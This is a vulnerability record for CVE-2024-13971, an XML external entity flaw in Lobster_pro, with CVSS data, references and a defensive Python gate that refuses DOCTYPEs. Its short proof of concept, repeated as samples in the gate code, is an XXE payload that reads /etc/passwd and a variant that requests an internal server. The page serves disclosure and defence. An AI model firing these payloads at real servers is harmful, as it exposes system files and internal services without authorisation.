Security Vulnerability Report
CVE-2024-13971 CVSS 7.5 HIGH

CVE-2024-13971

Published: 2026-04-30 13:16:03
Last Modified: 2026-05-17 23:17:01
Source: 23637b5d-af4c-4cf9-b8f6-deb7fd0f8423

Description

Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:lobster-world:lobster_pro:*:*:*:*:*:*:*:* - VULNERABLE
Lobster_pro < 4.12.6-GA

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

<!-- Alternatively for HTTP GET attack -->
<!--
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-server/secret">
]>
<root>&xxe;</root>
-->
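An inbound-XML gate for the CWE-611 pattern this record describes, added here as an example; it is not code from Lobster_pro, the vendor, or the advisory. It uses only the Python standard library, the sample documents are constructed, and the file/HTTP URIs in them are the same illustrative values as in the PoC above. It also shows the UTF-16 edge case a byte-level DOCTYPE check would otherwise miss.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample payloads (not captured from a real deployment). The first
# two mirror the two CWE-611 variants in the advisory: an external entity that
# reads a local file, and one that makes the server issue an HTTP GET.
FILE_READ_DOC = b'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>'''
SSRF_DOC = (b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal-server/secret"> ]>'
            b'<root>&xxe;</root>')
BENIGN_DOC = b'<?xml version="1.0"?><root><item id="1">ok</item></root>'

_BOMS = {b'\xff\xfe': 'utf-16-le', b'\xfe\xff': 'utf-16-be'}
# Any DOCTYPE is refused: a service expecting plain element/attribute payloads
# has no use for one, and it is the only place SYSTEM/PUBLIC entities can live.
_DOCTYPE = re.compile(r'<!DOCTYPE\b', re.IGNORECASE)
# Captures the system identifier of each external entity declaration
# (double- or single-quoted; the optional PUBLIC id is skipped) for logging.
_SYSTEM_ID = re.compile(
    r'<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\s+(?:["\'][^"\']*["\']\s+)?["\']([^"\']*)["\']',
    re.IGNORECASE)

def _to_text(data: bytes) -> str:
    # Decode by BOM so a UTF-16 payload cannot slip a DOCTYPE past a byte-level
    # check; everything else gets a lossy UTF-8 decode, which is enough to scan.
    for bom, enc in _BOMS.items():
        if data.startswith(bom):
            return data.decode(enc, errors='replace')
    return data.decode('utf-8', errors='replace')

def inspect_xml(data: bytes) -> dict:
    """Gate an inbound document: refuse any DOCTYPE and report entity URIs."""
    text = _to_text(data)
    return {'allowed': _DOCTYPE.search(text) is None,
            'external_uris': _SYSTEM_ID.findall(text)}

def safe_parse(data: bytes) -> ET.Element:
    """Parse only documents that pass the gate; the caller logs the refusal."""
    verdict = inspect_xml(data)
    if not verdict['allowed']:
        raise ValueError(f"DOCTYPE refused; external URIs: {verdict['external_uris']}")
    return ET.fromstring(data)

if __name__ == '__main__':
    for doc in (FILE_READ_DOC, SSRF_DOC, BENIGN_DOC):
        print(inspect_xml(doc))
```

The reported URIs are what a detection rule would alert on (file:// and internal-host targets); the parser itself should still be configured with external entity and DTD loading disabled, since this gate is defence in depth, not a replacement.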

References

https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/ (Exploit, Third Party Advisory)
http://seclists.org/fulldisclosure/2026/May/1

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-13971", "sourceIdentifier": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "published": "2026-04-30T13:16:02.680", "lastModified": "2026-05-17T23:17:01.153", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services."}], "metrics": {"cvssMetricV40": [{"source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:X/V:C/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "YES", "Recovery": "NOT_DEFINED", 
"valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lobster-world:lobster_pro:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.12.6-ga", "matchCriteriaId": "85F6EBAB-2377-46FC-9539-1AB64764FBB9"}]}]}], "references": [{"url": "https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/", "source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2026/May/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}